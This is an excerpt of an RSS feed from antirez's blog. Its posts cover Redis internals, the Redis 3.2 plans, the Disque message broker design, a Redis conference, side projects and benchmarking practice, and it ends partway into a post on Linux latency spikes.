Now that values of aggregated data types are fully unshared, and client output buffers don’t contain shared objects as well, there is a lot to exploit. For example it is finally possible to implement threaded I/O in Redis, so that different clients are served by different threads. This means that we’ll have a global lock only when accessing the database, but the clients read/write syscalls and even the parsing of the command the client is sending, can happen in different threads. This is a design similar to memcached, and one I look forward to implement and test.

Moreover it is now possible to implement certain slow operations on aggregated data types in another thread, in a way that only a few keys are “blocked” but all the other clients can continue. This can be achieved in a very similar way to what we do currently with blocking operations (see blocking.c), plus an hash table to store what keys are currently busy and with what client. So if a client asks for something like SMEMBERS it is possible to lock just the key, process the request creating the output buffer, and later release the key again. Only clients trying to access the same key will be blocked if the key is blocked.

All this requires even more drastic internal changes, but the bottom line here is, we have a taboo less. We can compensate object copying times with less cache misses and a smaller memory footprint for aggregated data types, so we are now free to think in terms of a threaded Redis with a share-nothing design, which is the only design that could easily outperform our single threaded one. In the past a threaded Redis was always seen as a bad idea if thought as a set of mutexes in data structures and objects in order to implement concurrent access, but fortunately there are alternatives to get the best of both the worlds. And we have the option to still serve all the fast operations like we did in the past from the main thread, if we want. There should be only to gain performance-wise, at the cost of some contained complexity.

ETA


I touched a lot of internals, this is not something which is going live tomorrow. So my plan is to call 3.2. what we have already into unstable, do the work to put it into Release Candidate state, and merge this branch into unstable targeting 3.4.

However before merging, a very scrupulous check for speed regression should be performed. There is definitely more work to do.

If you want to give it a try check the “lazyfree” branch on Github. Btw be aware that currently I’m working at it very actively so certain things may be at moments totally broken. Comments]]>
http://antirez.com/news/93
About Redis Sets memory efficiency http://antirez.com/news/92 http://antirez.com/news/92 Fri, 28 Aug 2015 09:40:32 +0000
On Hacker News people asked why not using Redis instead: https://news.ycombinator.com/item?id=10118413

Amplitude developers have their set of reasons for not using Redis, and in general if you have a very specific problem and want to scale it in the best possible way, it makes sense to implement your vertical solution. I’m not adverse to reinventing the wheel, you want your very specific wheel sometimes, that a general purpose system may not be able to provide. Moreover creating your solution gives you control on what you did, boosts your creativity and your confidence in what you, as a developer can do, makes you able to debug whatever bug may arise in the future without external help.

On the other hand of course creating system software from scratch is a very complex matter, requires constant developments if there is a wish to actively develop something, or means to have a stalled, non evolving piece of code if there is no team dedicated to it. If it is very vertical and specialized, likely the new system is capable of handling only a slice of the whole application problems, and yet you have to manage it as an additional component. Moreover if it was created by mostly one or a few programmers that later go away from the company, then fixing and evolving it is a very big problem: there isn’t sizable external community, nor there are the original developers.

Basically writing things in house is not good or bad per se, it depends. Of course it is a matter of sensibility to understand when it’s worth to implement something from scratch and when it is not. Good developers know.

From my point of view, regardless of what the Amplitude developers final solution was, it is interesting to read the process and why they are not using Redis. One of the concerns they raised is the overhead of the Set data type in Redis. I believe they are right to have such a concern, Redis Sets could be a lot more memory efficient, and weeks before reading the Amplitude article, I already started to explore ways to improve Sets memory efficiency. Today I want to share the plans with you.

Dual representation of data types
===

In principle there where plain data structures, implemented more or less like an algorithm text book suggests: each node of the data structure is implemented dynamically allocating it. Allocation overhead, fat pointers, poor cache locality, are the big limits of this basic solution.

Pieter Noordhuis and I later implemented specialized implementations of Redis abstract data types, to be very memory efficient, using single allocations to hold tens or a few hundreds of elements in a single allocation, sometimes with ad-hoc encodings to better use the space. Those versions of the data structures have O(N) time complexity for certain operations, or sometimes are limited to elements having a specific format (numbers) or sizes.

So for example when you create an Hash, it starts represented in a memory efficient way which is good for a small number of elements. Later it gets converted to a real hash table if the number of elements reach a given threshold. This means that the memory efficiency of a Redis data type depends a lot on the number of elements it stores.

The next step: Redis lists
===

At some point Twitter developers realized that there was no reason to go from an array of elements in a single allocation, representing items in a List, to an actual linked list which is a lot less memory efficient. There is something in the middle: a linked list of arrays representing a few items.
Their implementation does not handle defragmentation when you remove something in the middle. Pieter and I in the past tried to understand if this was worth or not, but we had some feeling the defragmentation effort may not be compensated by the space savings, and a non defragmenting implementation of this idea was too fragile as a general purpose implementation of Redis lists: remove a few elements in the middle and your memory usage changes dramatically.

Fortunately Matt Stancliff implemented the idea, including the defragmentation part, in an excellent way, and after some experimentation he showed that the new implementation was at least as good as the current implementation in Redis from the POV of performances, and much better from the point of view of memory usage. Moreover the memory efficiency of lists was no longer a function of the size of the list, and there was a single representation to deal with.

Lists are kinda special since, to have linked lists of small arrays is really an optimal representation that may not map easily to other data types. It is possible to do something like that for Sets and other data types?

Redis Sets
===

Sets memory usage is a bit special. They don’t have a specialized representation like all the other Redis data structures for sets composed of strings. So even a very small Set is going to consume a lot of memory. The special representation actually exists and is excellent but only works if the Set is composed of just numbers and is small: in such a case, we represent the Set with a special encoding called “intset”. It is an ordered linear array of integers, so that we can use binary search for testing existence of members. The array automatically changes size of each element depending on the greatest element in the set, so representing a set that has the strings 1, 20, 30, 15 is going to take just one byte per element plus some overhead, because the strings can be represented as numbers, and are inside the 8 bits range. However just add “a” to the set, and it will be converted into a full hash table:

127.0.0.1:6379> sadd myset 1 2 3 4 5
(integer) 5
127.0.0.1:6379> object encoding myset
"intset"
127.0.0.1:6379> sadd myset a
(integer) 1
127.0.0.1:6379> object encoding myset
"hashtable"

Sets of integer are a very used data type in Redis, so it is actually very useful to have that. But why we don’t have a special representation for small sets composed of non numerical strings, like we have for everything else? Well, the idea was that to have a data type with *three* representations was not going to be a good thing from the point of view of Redis internals. If you check t_zset.c o t_set.c you’ll see it require some care to deal with multiple representations. The more you want to abstract away dealing with N representations, the more you no longer have access to certain optimizations. Moreover the List story showed that it was possible to have a single representation with all the benefits. What you lose in terms of scanning the small aggregates containing N elements, you win back because of better cache locality, so it is possible to experiment with things that look like a tragic time/space tradeoff, but in reality are not.

Specializing Redis hash tables
===

Big hashes, non numerical (or big) sets, and big sorted sets, are currently represented by hash tables. The implementation is the one inside the dict.c file. It is an hash table implemented in a pretty trivial way, using chaining to resolve collisions. The special things in this hash table implementation are just two: it never blocks in order to rehash, the rehashing process is handled incrementally. I did this in the first months of my VMware sponsorship, and it was a big win in terms of latency, of course. dict.c also implements a special primitive called “scanning” invented by Pieter Noordhuis, which is a cursor based iterator without overheads nor state, but with reasonable guarantees. Apart from that the Redis hash table expects keys and values to be pointers to something, and methods in order to compare and release keys, and to release values.

This is how you want to design a general purpose hash table: pointers and methods (function pointers) to deal with values everywhere. However Redis data structures have an interesting property: every element in complex data structures are always, semantically strings. Hashes are maps between a string field and a string value. Sets are unordered sets of strings, and so forth.

What happens if we implement an hash table which is designed in order to store just string keys and string values? Well… it looks like there is a simple way to make such an hash table very memory efficient. We could set the load factor to something greater than 1, for example 10, and if there are 5 buckets in the hash table, each bucket will contain on average 10 elements.

So each bucket will be something like a linear array of key-value items, with prefixed lengths, in a very similar fashion to the encodings we use for small data types currently. Something like:

0: <3>foo<3>bar<5>hello<6>world!<0>
1: <8>user:103<3>811 … <0>
2: … <0>

And so forth. The encoding could be specialized or just something existing like MessagePack. So here the extra work you do in each bucket is hopefully compensated by the better locality you get.

To implement scanning and incremental rehashing on top of this data structure is viable as well, I did an initial analysis and while it is not possible to just copy the implementation in dict.c it is possible to find other ways to obtain the same effects.

Note that, technically speaking, it is possible to store pointers in such an hash table: they will be just strings from the point of view of the hash table implementation, and it is possible to signal, in the hash table type, that those are pointers that need special care (for example free-value function pointers or alike). However only testing can say if it’s worth it or not.

However there are problems that must be solved in order to use this for more than sets, or at least in order to use *only* such a representation, killing the small representations we have currently. For example, the current small representations have a very interesting property: they are already a serialization of themselves, without extra work required: we use this to store data into RDB files, to transfer data between nodes in Redis Cluster, and so forth. The specialized hash table should have the same property hopefully, or at least each single bucket should be already in a serialized format without any post-processing work required. If this is not the case, we could use this new dictionaries only in place of the general hash tables after the expansion, which is already a big win.

Conclusions
===

This is an initial idea that requires some time for the design to be improved, validated by an implementation later, and in-depth load tested to guarantee there is no huge regression in certain legitimate workloads. If everything goes well we may end with a Redis server which is a lot more memory efficient than in the past. Such an hash table may also be used in order to store the main Redis dictionary in order to make each key overhead much smaller. Comments]]>
http://antirez.com/news/92
Thanks Pivotal, Hello Redis Labs http://antirez.com/news/91 http://antirez.com/news/91 Wed, 15 Jul 2015 11:46:47 +0000
Thanks to the Pivotal sponsorship Redis was able to grow, to reach in the latest years a diffusion which I never expected it to reach. However for the final user it always was just a "pure" OSS project: go to the community web site, grab a tar ball, read the free documentation, send a pull request, and watch the stream of commits as they happen live.

In order to not stop this magic from happening, and in order to have enough free time to spend with my family, during these years I made the decision of not starting a Redis company. However I encouraged the creation of an economic ecosystem around Redis. There are multiple companies about Redis doing well at this point. There is one, Redis Labs, that made a remarkable steady work over the years in order to build a very strong company, with a team of developers hacking on the core of Redis, and a great set of products that provide Redis users with the commercial choices they need.

At some point it started to look like a good idea for me to move to Redis Labs. Running a big cluster of Redis instances and having a set of developers on the Redis core is the key asset for Redis future. We can work together in order to improve Redis faster, with a constant feedback on what happens into the wild of actual users running Redis and the efforts required in order to operate it at scale.

Redis Labs was willing to continue what VMware and Pivotal started. I'll be able to work as I do currently, spending all my time in the open source side of the project, while Redis Labs continues to provide Redis users with an hassles-free Redis experience of managed instances and products. However because of my close interaction with Redis Labs I believe we'll see much more contributions from Redis Labs developers to the Redis core. Things like the memory reduction pull requests which are going to be part of Redis 3.2, or the improvements to the key eviction process they contributed for Redis 3.0, are a clear example of what happens when you have great developers working at Redis, able to observe a large set of use cases.

I, Pivotal, and Redis Labs, all agree that this is important for the future of Redis, so I'm officially moving to Redis Labs starting from tomorrow morning. Thank you Pivotal and Redis Labs, we'll have to ship more OSS code in the next years, and this is just great.

EDIT: Redis Labs press release can be found here: https://redislabs.com/press-releases/redis-creator-salvatore-sanfilippo-antirez-joins-redis-labs Comments]]>
http://antirez.com/news/91
Commit messages are not titles http://antirez.com/news/90 http://antirez.com/news/90 Tue, 23 Jun 2015 08:55:22 +0000
This is a smart synopsis, as information dense as possible.

And when needed, this is the long version since:
1. I did this.
2. And resulted into this.
3. And you could reproduce this way.

So every time I'll be told again to don't put a dot at the end, I'll link to this article.

But no, it's not just a matter of a dot. If the first line of a commit message is a title, it changes *the way* you write it. It becomes just some text to introduce some more text, without any stress on the information density. Coders gotta code, so if something can be told in a very short way in one line, do it, and reserve the other additional informations for the next line, without sacrificing the first line since "It's a title".

Moreover, programming is the art of writing synopsis, otherwise you end with programs much more complex they should be. So perhaps it's also a good exercise for us. Comments]]>
http://antirez.com/news/90
Plans for Redis 3.2 http://antirez.com/news/89 http://antirez.com/news/89 Fri, 12 Jun 2015 13:53:53 +0000
Geo hashing API: This work originated from Ardb, that was originally a fork of Redis (https://github.com/yinqiwen/ardb), and was later extracted and improved by Matt Stancliff (https://matt.sh/redis-geo) that ported it to Redis. Open source is cool eh? The code needs a refactoring effort since currently duplicates parts of the sorted set implementation. It is not impossible that I may also change a few things about the API, I’m currently not sure, if there is something to fix, I’ll fix it. But the bottom line is: this is a great feature, now that Matt is no longer contributing to Redis, there is a huge risk to lose this work, so I’m going to do the effort of refactoring, reviewing and merging it as the first of the tasks for Redis 3.2. I think it is a very exciting addition to the Redis API.

Bloom filters: We’ll get bloom filters in 3.2. I’m not sure if this will be implemented as a String type feature like HyperLogLog are, but more likely as a new special type, since I'm interested in non trivial semantics that are more easy to provide as a new type. I’ve many design ideas for bloom filters, but I’m pretty sure I would like to have the ability to control from the API the accuracy/space tradeoff, perhaps not in the lower level from of specifying number of bits and hash functions to use, but in a more higher level way. Another thing I would love to have in this API is the ability of the bloom filter to auto-depollute itself (using multiple rotating filters or something like that). I’ll read all the available literature and decide what to do, but we’ll get this feature into 3.2.

Memory PRs: there are two important PRs from RedisLabs to improve Redis memory usage. We’ll get both merged.

Memory introspection command: A command that provides information about memory, like the LATENCY command but for memory usage. Hints about where is memory consumed, if its just the RSS that is high because of past peak memory usage, hints about amount of memory used by client output buffers, ability to resize the hash tables to save some memory if needed, and so forth.

Some Redis Cluster multi DC support. This will probably just be a “static” option of Cluster slaves so that they’ll not take part to promotion when the master fails. In this way using CLUSTER FAILOVER TAKEOVER it will be possible to promote all the slaves in a minority partition.

New List type operations: A few O(1) list operations like LMERGE, and O(N) operations that will be normally used with N very small so that they are most of the times O(1) operations, like operations to move N elements from a list to another.

AOF safety feature: https://github.com/antirez/redis/pull/2574

AOF rewrites optionally using an RDB preamble, so that rewriting the AOF and reloading back the content at startup is faster.

SPOP COUNT option (already implemented, 3.2 will be the first stable versions to get it))

Redis Cluster redis-trib rebalance command, in order to automatically rehash keys to end with an more homogeneous memory usage between nodes.

A few things originally planned for 3.2 were ported to 3.0 since they were safe. A recent example is ZADD with support for options like NX and XX. In general it is possible that a few more commands about existing types will be added to Redis 3.2. This is basically a Redis version which is designed to make happy people that wanted more in the API side, since for a while we focused more on the operations aspect of Redis.

About the ETA, the work is starting Monday, and I hope they’ll not take more time than the end of September, when the first RC will be pushed. Once it is RC, the RC -> Stable transition time is not scheduled, it is a function of the reporting time of critical bugs. Once for a few weeks nobody notices more bad issues, we’ll go stable.

I’ll follow up with new blog posts about single entries listed above, like for the Geo hashing thing, the bloom filter final implementation and API description, and so forth.

In the meantime, have fun with Redis 3.0! Comments]]>
http://antirez.com/news/89
Adventures in message queues http://antirez.com/news/88 http://antirez.com/news/88 Sun, 15 Mar 2015 22:32:15 +0000
It is a few months that I spend ~ 15-20% of my time, mostly hours stolen to nights and weekends, working to a new system. It’s a message broker and it’s called Disque. I’ve an implementation of 80% of what was in the original specification, but still I don’t feel like it’s ready to be released. Since I can’t ship, I’ll at least blog… so that’s the story of how it started and a few details about what it is.

~ First steps ~

Many developers use Redis as a message queue, often wrappered via some library abstracting away Redis low level primitives, other times directly building a simple, ad-hoc queue, using the Redis raw API. This use case is covered mainly using blocking list operations, and list push operations. Redis apparently is at the same time the best and the worst system to use like that. It’s good because it is fast, easy to inspect, deploy and use, and in many environments it was already one piece of the infrastructure. However it has disadvantages because Redis mutable data structures are very different than immutable messages. Redis HA / Cluster tradeoffs are totally biased towards large mutable values, but the same tradeoffs are not the best ones to deal with messages.

One thing that is important to guarantee for a message broker is that a message is delivered either at least one time, or at most one time. In short given that to guarantee an exact single delivery of a message (where for delivery we intent a message that was received *and* processed by a worker) is practically impossible, the choices are that the message broker is able to guarantee either 0 or 1 deliveries, or 1 to infinite deliveries. This is often referred as at-most-once semantics, and at-least-once semantics. There are use cases for the first, but the most interesting and practical semantics is the latter, that is, to guarantee that a message is delivered at least one time, and deliver multiple times if there are failures.

So a few months ago I started to think at some client-side protocol to use a set of Redis masters (without replication or clustering whatsoever) in a way that provides these guarantees. Sometimes with small changes in the way Redis is used for an use case, it is possible to end with a better system. For example for distributed locks I tried to document an algorithm which is trivial to implement but more robust than the single-instance + failover implementation (http://redis.io/topics/distlock).

However after a few days of work my design draft suggested that it was a better bet to design an ad-hoc system, since the client-side algorithm ended being too complex, non optimal, and certain things I absolutely wanted were impossible or very hard to do. To add more things to Redis sounded like a bad idea, it does a lot of things already, and to cover messaging well I needed things which are very different than the way Redis operates. But why to design a new system given that the world is full of message brokers? Because an impressive number of users were using Redis instead of systems specifically designed for this goal, and this was strange. A few can be wrong, but so many need to get some reason. Maybe Redis low barrier of entry, easy API, speed, were not what most people were accustomed to when they looked at the message brokers landscape. It seems populated by solutions that are either too simple, asking the application to do too much, or too complex, but super full featured. Maybe there is some space for the “Redis of messaging”?

~ Redis brutally forked ~

For the first time in my life I didn’t started straight away to write code. For weeks I looked at the design from time to time, converted it into a new system and not a Redis client library, and tried to understand, as an user, what would make me very happy in a message broker. The original use case remained the same: delayed jobs. Disque is a general system, but 90% of times in the design the “reference” was an user that has to solve the problem of sending messages that are likely jobs to process. If something was against this use case, it was removed.

When the design was ready, I finally started to code. But where to start? “vi main.c”? Fortunately Redis is, in part, a framework to write distributed systems in C. I had a protocol, network libraries, clients handling, node-to-node message bus. To rewrite all this from scratch sounded like a huge waste. At the same time I wanted Disque to be able to completely diverge from Redis in any details possible if this is needed, and I wanted it to be a side project without impacts on Redis itself. So instead of trying the huge undertake of splitting Redis into an actual separated framework, and the Redis implementation, I took a more pragmatic approach: I forked the code, and removed everything that was Redis specific from the source code, in order to end with a skeleton. At this point I was ready to implement my specification.

~ What is Disque? ~

After a few months of very non intense work and just 200 commits I’ve finally a system that no longer looks like a toy: it looked like a toy for many weeks so I was afraid of even talking about it, since the probability of me just deleting the source tree was big. Now that most of the idea is working code with tests, I’m finally sure this will be released in the future, and to talk about the tradeoffs I took in the design.

Disque is a distributed system, by default. Since it is an AP system, it made no sense to have like in Redis a single-node mode and a distributed mode. A single Disque node is just a particular case of a cluster, having just one node.
So this was of the important points in the design: fault tolerant, resistant to partitions, and available no matter how many nodes are still up, aka AP. I also wanted a system that was inherently able to scale in different scenarios, both when the issue is many producers and consumers with many queues, and when instead all this producers and consumers are all focusing on a single queue, that may be distributed into multiple nodes.

My requirements were telling me aloud one thing… that Disque was going to make a big design sacrifice. Message ordering. Disque only provides best-effort ordering. However because of this sacrifice, there is a lot to gain… tradeoffs are interesting since sometimes they totally open the design space.

I could continue recounting you what Disque is like that, however a few months ago I saw a comment in Hacker News, written by Jacques Chester, see https://news.ycombinator.com/item?id=8709146 [EDIT: SORRY I made an error cut&pasting the wrong name of Adrian (Hi Adrian, sorry for misquoting you!)]. Jacques, that happens to work for Pivotal like me, was commenting how different messaging systems have very different set of features, properties, and without the details it is almost impossible to evaluate the different choices, and to evaluate if one is faster than the other because it has a better implementation, or simple offers a lot less guarantees. So he wrote a set of questions one should ask when evaluating a messaging system. I’ll use his questions, and add a few more, in order to describe what Disque is, in the hope that I don’t end just hand waving, but providing some actual information.

Q: Are messages delivered at least once?

In Disque you can chose at least once delivery (the default), or at most once delivery. This property can be set per message. At most once delivery is just a special case of at least once delivery, setting the “retry” parameter of the message to 0, and replicating the message to a single node.

Q: Are messages acknowledged by consumers?

Yes, the only way for a consumer to tell the system the message got delivered correctly, is to acknowledge it.

Q: Are messages delivered multiple times if not acknowledged?

Yes, Disque will automatically deliver the message again, after a “retry” time, forever (up to the max TTL time for the message).
When messages are acknowledged, the acknowledge is propagated to the nodes having a copy of the message. If the system believes everybody was reached, the message is finally garbage collected and removed. Acknowledged messages are also evicted during memory pressure.

Nodes run a best-effort algorithm to avoid to queue the same message multiple times, in order to approximate single delivery better. However during failures, multiple nodes may re-deliver the same message multiple times at the same time.

Q: Is queueing durable or ephemeral.

Durable.

Q: Is durability achieved by writing every message to disk first, or by replicating messages across servers?

By default Disque runs in-memory only, and uses synchronous replication to achieve durability (however you can ask, per message, to use asynchronous replication). It is possible to turn AOF (similarly to Redis) if desired, if the setup is likely to see a mass-reboot or alike. When the system is upgraded it is possible to write the AOF on disk just for the upgrade in order to don’t lose the state after a restart even if normally disk persistence is not used.

Q: Is queueing partially/totally consistent across a group of servers or divided up for maximal throughput?

Divided up for throughput, however message ordering is preserved in a best-effort way. Each message has an immutable “ctime” which is a wall-clock milliseconds timestamp plus an incremental ID for messages generated in the same millisecond. Nodes use this ctime in order to sort messages for delivery.

Q: Can messages be dropped entirely under pressure? (aka best effort)

No, however new messages may be refused if there is no space in memory. When 75% of memory is in use, nodes receiving messages try to externally replicate them, just to outer nodes, without taking a copy, but it many not work if also the other nodes are in an out of memory condition.

Q: Can consumers and producers look into the queue, or is it totally opaque?

There are commands to “PEEK” into queues.

Q: Is queueing unordered, FIFO or prioritised?

Best-effort FIFO-ish as explained.

Q: Is there a broker or no broker?

Broker as a set of masters. Clients can talk to whatever node they want.

Q: Does the broker own independent, named queues (topics, routes etc) or do producers and consumers need to coordinate their connections?

Named queues. Producers and consumers does not need to coordinate, since nodes use federation to discover routes inside the cluster and pass messages as they are needed by consumers. However the client is provided with hints in case it is willing to relocate where more consumers are.

Q: Is message posting transactional?

Yes, once the command to add a message returns, the system guarantees that there are the desired number of copies inside the cluster.

Q: Is message receiving transactional?

I guess not, since Disque will try to deliver the same message again if not acknowledged.

Q: Do consumers block on receive or can they check for new messages?

Both behaviors are supported, by default it blocks.

Q: Do producers block on send or can they check for queue fullness?

The producer may ask to get an error when adding a new message if the message length is already greater than a specified value in the local node it is pushing the message.

Moreover the producer may ask to replicate the message asynchronously if it want to run away ASAP and let the cluster replicate the message in a best-effort way.

There is no way to block the consumer if there are too many messages in the queue, and unblock it as soon as there are less messages.

Q: Are delayed jobs supported?

Yes, with second granularity, up to years. However they’ll use memory.

Q: Can consumers and producers connect to different nodes?

Yes.

I hope with this post Disque is a bit less vaporware. Sure, without looking at the code it is hard to tell, but if your best feature is out you can already complain at least.
How much of the above is already implemented and working well? Everything but AOF disk persistence, and a few minor things I want to refine in the API, so first release should not be too far, but working at it so rarely it is hard to get super fast. Comments]]>
http://antirez.com/news/88
Redis Conference 2015 http://antirez.com/news/87 http://antirez.com/news/87 Tue, 10 Mar 2015 09:22:20 +0000
The conference was organized by RackSpace in a magistral way, with RedisLabs, Heroku, and Hulu, sponsoring it as well. I can’t say thank you enough times to everybody. Many people traveled from different parts of US and outside US to SF just for a couple of days, the venue was incredibly cool, and everything organized in the finest details.

There was even an incredible cake for the Redis 6th birthday :-)

However the killer features of the conference were, the number and the quality of the attenders (mostly actual Redis users), around 250 people, and the quality of the talks. The conference was free, even if it did not looked like a free conference at all, at any level. An incredible stage where to talk, very high quality food, plenty of space. All this honestly helped to create a setup for interesting exchanges. Everybody was using Redis for something, to get actual things done, and a lot of people shared their experiences. Among the talks I found Hulu and Heroku ones extremely interesting, because they covered details about different use cases and operational challenges. I also happen to agree with Bill Andersen (from RackSpace) vision on benchmarking Redis in a use-case oriented fashion, even if I missed the initial part of his talk because I was being interviewed, but the cool thing is, there will be recordings of the talks, so it will be possible for everybody to watch them when available at the conf site, which is, http://redisconference.com

I was approached by several VeryLargeCompanies recounting stories of how they are using or are going to use Redis to do VeryLargeUseCase. Basically at this point Redis is everywhere.

Redis Conference was a big gift to the Redis community… and in some way it shows very well how much there is a Redis outside Redis, I mean, at this point it has a life outside the borders of the server and client libraries repositories. It is a technology with many users that exchange ideas and that work with it in different ways: internally to companies to provide it as a technology to cover a number of use cases, and also in the context of cloud providers, that are providing it as a service to other companies.

One thing I did not liked was Matt Stancliff talk. He tried to uncover different problems in the Redis development process, and finally proposed the community to replace me as the project leader, with him. In my opinion what Matt actually managed to do was to cherry-pick from my IRC, Twitter and Github issues posts in a very unfair way, in order to provide a bad imagine of myself. I think this was a big mistake. Moreover he did the talk as the last talk, not providing a right to reply. Matt and I happen to be persons with very different visions in many ways, however Redis is a project I invested many years into, and I’m not going to change my vision, I’m actually afraid I merged some code under pressure that I now find non well written and designed.

What prevents Redis for becoming a monoculture is its license, if the community at some point really believes it is possible to do much better, or simply to do things in a very different way, some forks will appear, and darwinian selection will work to make sure we have the best Redis possible. Technical leadership is a reward for the work you are capable to do, is not asked at conferences. Moreover technology is not just code, is also about human interactions, and life is too short to interact with people we don’t share the same fundamental values of what a good behavior is.

Well, even if this left some bitter taste, overall the Redis Conference was a magical experience, and even Matt talk actually helped me to understand what to do in the future and what I want for this project. Thank you to who made it possible and to all the attenders, I hope to see you again next year. Comments]]>
http://antirez.com/news/87
Side projects http://antirez.com/news/86 http://antirez.com/news/86 Thu, 26 Feb 2015 12:48:06 +0000
How did I stopped doing new things to focus into an unique effort, drastically monopolizing my professional life? It was a too big sacrifice to do, for an human being with a limited life span. Fortunately I simply never did this, I never stopped doing new things.

If I look back at those 6 years, it was an endless stream of side projects, sometimes related to Redis, sometimes not.

1) Load81, children programming environment.
2) Dump1090, software defined radio ADS-B decoder.
3) A Javascript ray tracer.
4) lua-cmsgpack, C implementation of msgpack for Lua.
5) linenoise line editing library. Used in Redis, but well, was not our top priority.
6) lamernews, Redis-based HN clone.
7) Gitan, a small Git web interface.
8) shapeme, images evolver using simulated annealing.
9) Disque, a distributed queue (work in progress right now).

And there are much more throw-away projects not listed here.
The interesting thing is that many of the projects listed above are not random hacking efforts that had as an unique goal to make me happy. A few found their way into other people’s code.

Because of the side projects, I was able to do different things when I was stressed and impoverished from doing again and again the same thing. I could later refocus on Redis, and find again the right motivations to have fun with it, because small projects are cool, but to work for years at a single project can provide more value for others in the long run.

So currently I’m using something like 20% of my time to hack on Disque, a distributed message queue. So only 80% is left for Redis development, right? Wrong. The deal is between 80% of focus on Redis and 20% on something else, or 0% of focus on Redis in the long term, because in order to have a long term engagement, you need a long term alternative to explore new things.

Side projects are the projects making your bigger projects possible. Moreover they are often the start of new interesting projects. Redis itself was a side project of LLOOGG. Sometimes you stop working at your main project because of side projects, but when this happens it is not because your side project captured your focus, it is because you managed to find a better use for your time, since the side project is more important, interesting, and compelling than the main project.

Redis is six years old today, but is aging well: it continues to capture the attention of more developers, and it continues to improve in order to provide a bit more value to users every week. However for me, more users, more pull requests, and more pressure, does not mean to change my setup. What Redis is today is the sum of the work we put into it, and the endurance in the course of six years. To continue along the same path, I’ll make sure to have a few side projects for the next years.

UPDATE: Damian Janowski provided an incredible present for the Redis community today, the renewed Redis.io web site is online now! http://redis.io. Thanks Damian!

HN comments here: https://news.ycombinator.com/item?id=9112250 Comments]]>
http://antirez.com/news/86
Why we don’t have benchmarks comparing Redis with other DBs http://antirez.com/news/85 http://antirez.com/news/85 Thu, 29 Jan 2015 09:21:41 +0000
When you compare two databases, to get fair numbers, they need to share *a lot*: data model, exact durability guarantees, data replication safety, availability during partitions, and so forth: often a system will score in a lower way than another system since it sacrifices speed to provide less “hey look at me” qualities but that are very important nonetheless. Moreover the testing suite is a complex matter as well unless different database systems talk the same exact protocol: differences in the client library alone can contribute for large differences.

However there are people that beg to differ, and believe comparing different database systems for speed is a good idea anyway. For example, yesterday a benchmark of Redis and AerospikeDB was published here: http://lynnlangit.com/2015/01/28/lessons-learned-benchmarking-nosql-on-the-aws-cloud-aerospikedb-and-redis/.

I’ll use this benchmark to show my point about how benchmarks are misleading beasts. In the benchmark huge EC2 instances are used, for some strange reason, since the instances are equipped with 244 GB of RAM (!). Those are R3.8xlarge instances. For my tests I’ll use a more real world m3.medium instance.

Using such a beast of an instance Redis scored, in the single node case, able to provide 128k ops per second. My EC2 instance is much more limited, testing from another EC2 instance with Redis benchmark, not using pipelining, and with the same 100 bytes data size, I get 32k ops/sec, so my instance is something like 4 times slower, in the single process case.

Let’s see with Redis INFO command how the system is using the CPU during this benchmark:

# CPU
used_cpu_sys:181.78
used_cpu_user:205.05
used_cpu_sys_children:0.12
used_cpu_user_children:0.87
127.0.0.1:6379> info cpu

… after 10 seconds of test …

# CPU
used_cpu_sys:184.52
used_cpu_user:206.42
used_cpu_sys_children:0.12
used_cpu_user_children:0.87

Redis spent ~ 3 seconds of system time, and only ~ 1.5 seconds in user space. What happens here is that for each request the biggest part of the work is to perform the read() and write() call. Also since it’s one-query one-reply workload for each client, we pay a full RTT for each request of each client.

Now let’s check what happens if I use pipelining instead, a feature very known and much exploited by Redis users, since it’s the only way to maximize the server usage, and there are usually a number of places in the application where you can perform multiple operations at a given time.

With a pipeline of 32 operations the numbers changed drastically. My tiny instance was able to deliver 250k ops/sec using a single core, which is 25% of the *top* result using 32 (each faster) cores in the mentioned benchmark.

Let’s look at the CPU time:

# CPU
used_cpu_sys:189.16
used_cpu_user:216.46
used_cpu_sys_children:0.12
used_cpu_user_children:0.87
127.0.0.1:6379> info cpu

… after 10 seconds of test …

# CPU
used_cpu_sys:190.60
used_cpu_user:224.92
used_cpu_sys_children:0.12
used_cpu_user_children:0.87

This time we are actually using the database engine to serve queries with our CPU, we are not just losing much of the time context switching. We used ~1.5 seconds of system time, and 8.46 seconds into the Redis process itself.

Using lower numbers in the pipeline gets us results in the middle. Pipeline of 4 = 100k ops/sec (that should translate to ~ 400k ops/sec in the bigger instance used in the benchmark), pipeline 8 = 180k ops/sec, and so forth.

So basically it is not a coincidence that benchmarking Redis and AerospikeDB in this way we get remarkably similar results. More or less you are not testing the databases, but the network stack and the kernel. If the DB can serve queries using a read and a write system call without any other huge waste, this is what we get, and here the time to serve the actual query is small since we are talking about data fitting into memory (just a note, 10M keys of 100k in Redis will use a fraction of the memory that was allocated in those instances).

However there is more about that. What about the operations we can perform? To test Redis doing GET/SET is like to test a Ferrari checking how good it is at cleaning the mirror when it rains.

A fundamental part of the Redis architecture is that largely different operations have similar costs, so what about our huge Facebook game posting scores of the finished games to create the leaderboard?

The same single process can do 110k ops/sec when the query is: ZADD myscores .

But let’s demand more, what about estimating the cardinality with the HyperLogLog, at the same time adding new elements and reading the current guess with two redis-benchmark processes? Set size is 10 millions again. So during this test I spawned a benchmark executing PFADD with random elements of the set, and another doing PFCOUNT at the same time in the same HyperLogLog. Both scored simultaneously at 250k ops/sec, for a total of half a million ops per second with a single Redis process.

In Redis doing complex operations is similar to pipelining. You want to do *more* for each read/write, otherwise your performance is dominated by I/O.

Ok, so a few useful remarks. 1) GET/SET Benchmarks are not a great way to compare different database systems. 2) A better performance comparison is by use case. You say, for a given specific use case, using different data model, schema, queries, strategies, how much instances I need to handle the same traffic for the same app with two different database systems? 3) Test with instance types most people are going to actually use, huge instance types can mask inefficiencies of certain database systems, and is anyway not what most people are going to use.

We’ll continue to optimize Redis for speed, and will continue to avoid posting comparative benchmarks.

[Thanks to Amazon AWS for providing me free access to EC2] Comments]]>
http://antirez.com/news/85
Redis latency spikes and the Linux kernel: a few more details http://antirez.com/news/84 http://antirez.com/news/84 Mon, 03 Nov 2014 15:58:19 +0000
The test was performed with a 1GB of data in memory, with 150k writes per second originating from a different EC2 instance, targeting 5 million keys (evenly distributed). The pipeline was set to 4 commands. This translates to the following command line of redis-benchmark:

./redis-benchmark -P 4 -t set -r 5000000 -n 1000000000

